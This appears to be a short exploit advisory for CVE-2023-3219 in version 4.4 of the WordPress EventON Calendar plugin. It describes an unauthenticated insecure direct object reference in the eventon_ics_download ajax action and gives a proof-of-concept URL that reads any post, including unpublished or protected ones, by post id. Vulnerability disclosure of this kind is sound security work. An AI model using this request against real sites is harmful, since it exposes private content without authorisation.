WordPress EventON Calendar plugin version 4.4 suffers from an insecure direct object reference vulnerability related to posting.
2f87612cff5b66dcbd6a5886fbc280b3873c37bd95eb601dfb54cb6abd4f70f2# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR
# Date: 03.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.myeventon.com/
# Version: 4.4
# Tested on: Google and Firefox latest version
# CVE : CVE-2023-3219
# 1. Description
The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.
# 2. Proof of Concept (PoC)
Proof of Concept:
https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=<any post id>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed